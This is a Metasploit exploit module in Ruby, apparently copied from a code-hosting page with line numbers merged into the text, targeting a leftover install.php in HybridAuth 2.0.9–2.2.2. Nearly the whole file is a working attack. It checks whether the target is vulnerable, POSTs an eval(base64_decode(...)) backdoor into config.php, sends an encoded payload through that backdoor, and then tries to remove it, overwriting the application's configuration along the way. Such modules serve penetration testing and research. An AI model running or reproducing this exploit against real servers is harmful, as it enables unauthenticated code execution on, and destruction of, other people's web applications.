Path: blob/master/modules/exploits/unix/webapp/hybridauth_install_php_exec.rb
19715 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ManualRanking # application config.php is overwritten78include Msf::Exploit::Remote::HttpClient910def initialize(info = {})11super(12update_info(13info,14'Name' => 'HybridAuth install.php PHP Code Execution',15'Description' => %q{16This module exploits a PHP code execution vulnerability in17HybridAuth versions 2.0.9 to 2.2.2. The install file 'install.php'18is not removed after installation allowing unauthenticated users to19write PHP code to the application configuration file 'config.php'.2021Note: This exploit will overwrite the application configuration file22rendering the application unusable.23},24'License' => MSF_LICENSE,25'Author' => [26'Pichaya Morimoto', # Discovery and PoC27'bcoles' # Metasploit28],29'References' => [30['EDB', '34273'],31['OSVDB', '109838']32],33'Arch' => ARCH_PHP,34'Platform' => 'php',35'Targets' => [36# Tested:37# HybridAuth versions 2.0.9, 2.0.10, 2.0.11, 2.1.2, 2.2.2 on Apache/2.2.14 (Ubuntu)38['HybridAuth version 2.0.9 to 2.2.2 (PHP Payload)', {}]39],40'Privileged' => false,41'DisclosureDate' => '2014-08-04',42'DefaultTarget' => 0,43'Notes' => {44'Reliability' => UNKNOWN_RELIABILITY,45'Stability' => UNKNOWN_STABILITY,46'SideEffects' => UNKNOWN_SIDE_EFFECTS47}48)49)5051register_options(52[53OptString.new('TARGETURI', [true, 'The base path to HybridAuth library', '/hybridauth/'])54]55)56end5758#59# Check:60# * install.php exists61# * config.php is writable62# * HybridAuth version is 2.0.9 to 2.0.11, 2.1.x, or 2.2.0 to 2.2.263#64def check65res = send_request_cgi 'uri' => normalize_uri(target_uri.path, 'install.php')66if !res67vprint_error "Connection failed"68return Exploit::CheckCode::Unknown69elsif res.code == 40470vprint_error "Could not find install.php"71elsif res.body =~ />([^<]+)<\/span> must be <b >WRITABLE</72vprint_error "#{$1} is not writable"73elsif res.body =~ />HybridAuth (2\.[012]\.[\d\.]+(-dev)?) Installer</74version = res.body.scan(/>HybridAuth (2\.[012]\.[\d\.]+(-dev)?) Installer</).first.first75vprint_status "Found version: #{version}"76if version =~ /^2\.(0\.(9|10|11)|1\.[\d]+|2\.[012])/77return Exploit::CheckCode::Vulnerable78else79vprint_error "HybridAuth version #{version} is not vulnerable"80end81end82Exploit::CheckCode::Safe83end8485#86# Exploit87#88def exploit89# check vuln90if check != Exploit::CheckCode::Vulnerable91fail_with Failure::NotVulnerable, "#{peer} - Target is not vulnerable"92end9394# write backdoor95print_status "Writing backdoor to config.php"96payload_param = rand(1000)97res = send_request_cgi(98'method' => 'POST',99'uri' => normalize_uri(target_uri.path, 'install.php'),100'data' => "OPENID_ADAPTER_STATUS=eval(base64_decode($_POST[#{payload_param}])))));/*"101)102if !res103fail_with Failure::Unknown, "#{peer} - Connection failed"104elsif res.body =~ /Installation completed/105print_good "Wrote backdoor successfully"106else107fail_with Failure::UnexpectedReply, "#{peer} - Coud not write backdoor to 'config.php'"108end109110# execute payload111code = Rex::Text.encode_base64(payload.encoded)112print_status "Sending payload to config.php backdoor (#{code.length} bytes)"113res = send_request_cgi({114'method' => 'POST',115'uri' => normalize_uri(target_uri.path, 'config.php'),116'data' => "#{payload_param}=#{code}"117}, 5)118if !res119print_warning "No response"120elsif res.code == 404121fail_with Failure::NotFound, "#{peer} - Could not find config.php"122elsif res.code == 200 || res.code == 500123print_good "Sent payload successfully"124end125126# remove backdoor127print_status "Removing backdoor from config.php"128res = send_request_cgi(129'method' => 'POST',130'uri' => normalize_uri(target_uri.path, 'install.php'),131'data' => 'OPENID_ADAPTER_STATUS='132)133if !res134print_error "Connection failed"135elsif res.body =~ /Installation completed/136print_good "Removed backdoor successfully"137else138print_warning "Could not remove payload from config.php"139end140end141end142143144